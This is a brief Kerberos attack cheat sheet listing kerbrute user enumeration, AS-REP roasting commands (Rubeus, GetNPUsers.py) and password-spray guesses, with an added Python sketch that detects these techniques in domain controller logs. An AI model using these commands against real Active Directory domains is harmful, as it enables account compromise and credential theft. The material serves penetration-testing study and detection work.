Kerberos
Methods of attacking Kerberos.
Unauthenticated Attacks
User Enumeration
Command: ./kerbrute userenum -d <fqdn> --dc <dc_ip> userlist.txt
Description: Enumerate valid usernames. Enumerating valid usernames greatly increases the likelihood of successful password attacks.
ASREPRoast
This can be done two ways.
Rubeus
Command: Rubeus.exe asreproast
GetNPUsers.py
Command: python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
Description: Check ASREPRoast with the list of enumerated users (no credentials required).
Password Attack
With the list of usernames recovered, select one or two passwords to spray. Start with something like <season|month>2021!
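From the defender's side, the three unauthenticated techniques above each leave a distinct trace in domain controller Security events 4768 and 4771. The following detection sketch is an added example, not part of the original page; the record field names, thresholds, and sample events are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample records (not real logs). Field names are assumptions that
# mirror Windows Security events 4768 (TGT requested) and 4771 (pre-auth failed).
def ev(ts, eid, user, ip, status, preauth="-"):
    return {"ts": ts, "id": eid, "user": user, "ip": ip,
            "status": status, "preauth": preauth}

SAMPLE = (
    # 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN: many unknown names from one host
    [ev(10 + i, 4768, f"guess{i}", "10.0.0.50", "0x6") for i in range(5)]
    # TGT issued with pre-authentication type 0 (account has pre-auth disabled)
    + [ev(40, 4768, "svc_legacy", "10.0.0.50", "0x0", "0")]
    # 0x18 = bad password: one failure each across several accounts
    + [ev(60 + i, 4771, f"user{i}", "10.0.0.50", "0x18") for i in range(4)]
    # Benign: a normal logon (type 2 = encrypted timestamp) and one typo
    + [ev(70, 4768, "alice", "10.0.0.7", "0x0", "2"),
       ev(75, 4771, "bob", "10.0.0.8", "0x18")]
)

def detect(events, window=300, enum_min=3, spray_min=3):
    """Flag enumeration, AS-REP requests without pre-auth, and spraying.

    Counts distinct accounts per source IP inside fixed `window`-second
    buckets; thresholds are illustrative and need tuning per environment.
    """
    unknown = defaultdict(set)  # (ip, bucket) -> names the KDC did not know
    badpw = defaultdict(set)    # (ip, bucket) -> accounts with a bad password
    findings = []
    for e in events:
        key = (e["ip"], e["ts"] // window)
        if e["id"] == 4768 and e["status"] == "0x6":
            unknown[key].add(e["user"])
        elif e["id"] == 4768 and e["status"] == "0x0" and e["preauth"] == "0":
            findings.append(("asrep_no_preauth", e["ip"], e["user"]))
        elif e["id"] == 4771 and e["status"] == "0x18":
            badpw[key].add(e["user"])
    for label, table, minimum in (("user_enumeration", unknown, enum_min),
                                  ("password_spray", badpw, spray_min)):
        for (ip, _), names in table.items():
            if len(names) >= minimum:
                findings.append((label, ip, len(names)))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

Accounts reported as asrep_no_preauth are the ones to remediate by clearing "Do not require Kerberos preauthentication" in Active Directory.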
Kerberoast